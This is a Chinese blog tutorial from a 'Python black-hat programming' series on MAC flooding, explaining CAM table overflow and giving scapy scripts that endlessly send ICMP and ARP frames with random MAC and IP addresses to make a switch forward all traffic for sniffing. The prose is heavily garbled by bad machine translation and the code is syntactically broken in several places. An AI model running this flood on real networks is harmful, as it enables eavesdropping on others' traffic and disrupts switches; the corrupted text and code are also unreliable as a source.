Menu
0 Comments

Python黑帽编程 3.3 MAC洪水攻击 – 玄魂工作室

引渡配电盘(我只校验我提出运用的交替地机具)。,本着心灵仅有的大约表述)在档案转发审阅中依托对CAM表的查询来决定右手的转发交谈,有重大意义的的MAC的对应登记不克不及在曲中找到。,这档案帧将被处置为播送帧。。凸轮台的生产率是限定的。,独自地多数使受协议条款的约束可以往事。,当CAM表记载的MAC地址手脚能够到的范围上限时,新的登记不见得添加到CAM表中。

由于由于道德规范,笔者会显示证据独身十分风趣的景象。。PC延续发送档案帧到未知目标。,而且每个包的源MAC地址是清楚的的。,当这些集合以十足快的全速前进发送时,在增强时间内感光快的填出轨的凸轮身材。这些伪造的MAC地址利用了CAM表。,真马 C地址登记无法进入CAM表。。经过配电盘的究竟哪一个主力队员单播档案帧都是PROC。。在这种情况下,配电盘被免职为集中器。。

当配电盘被免职为集中器后,,笔者可以监控连接到配电盘指挥者的尽量的档案。。

自然,详细交替地装置对ARP洪水的解答是不同的,必要现场校验。现时让笔者进入课程交链。。

编码技击术

有大量的方式来建造随机MAC和IP地址。,因地址的规范体式是在的。,任命起来悠闲地。。在这一点上要给各位引见的是scapy模块做成某事RandMAC和RandIP方式。这两种方式用于随机发展MAC地址和IP地址。,接纳模板参量的方式,发展任命段的地址。。

比如,上面的行为准则:

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandMAC()

    print RandIP()

    i=i-1

比分列举如下所示。:

图2

即使必要IP来发展整齐的的电网络段,您可以输出任命的模板。。

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandIP(“.*”)

    i=i-1

运转比分列举如下:

图3

在求解随机成绩过后,现时让笔者思索什么的档案包可以手脚能够到的范围这专注的。让笔者,即使笔者的包中有任命的源IP和MAC。,和出轨将被记载决定并宣布。。

比如ARP包:

Ether(SRC)RandMAC(),dst=FF:FF:FF:FF:FF:FFARP(OP)2,
psrc=
“”, hwdst=FF:FF:FF:FF:FF:FF)/Padding(工作量)“X”*18))

比如,ICMP包装。:

Ether(SRC)RandMAC(“*:*:*:*:*:*”),

dst=RandMAC(“*:*:*:*:*:*”)) / \

IP(SRC)RandIP(“*.*.*.*”),

dst=RandIP(“*.*.*.*”)) / \

ICMP()

处理了这两个精髓成绩。,你可以写出整整的行为准则。:

图4

#!/usr/bin/python

import sys

from scapy.all import *

import time

iface=”eth0″

if Le())> 2

    iface=[1]

(1)

    packet= Ether(SRC)RandMAC(“*:*:*:*:*:*”),

                  dst=RandMAC(“*:*:*:*:*:*”)) / \

    IP(SRC)RandIP(“*.*.*.*”),

    dst=RandIP(“*.*.*.*”)) / \

    ICMP()

    ()

    sendp(packet,iface=iface,loop=0)

是你这么说的嘛!行为准则延续发送ICMP档案包。,来发生MAC洪水攻击。运转比分列举如下:

图5

2总结

本条文缺乏状态课程的新知识。,次要贫穷是您对互通式立体交叉电网络和以太网W的了解。。

下一节,让笔者摸索对VLAN的攻击。。

VLAN攻击做切片已在WeChat订阅号中公布。,热情的先生输出订阅号码(较低的二维码),从菜单栏> Python黑帽课程,您可以进入。。

检查整整的Windows 教程串联,请小心我的微信订阅号(宣匈521),低维二维码,恢复蟒。成绩议论请加QQ群。:Hacking (1群):303242737   Hacking (2群):147098303。

 

谜灵魂演播室

发表评论

电子邮件地址不会被公开。 必填项已用*标注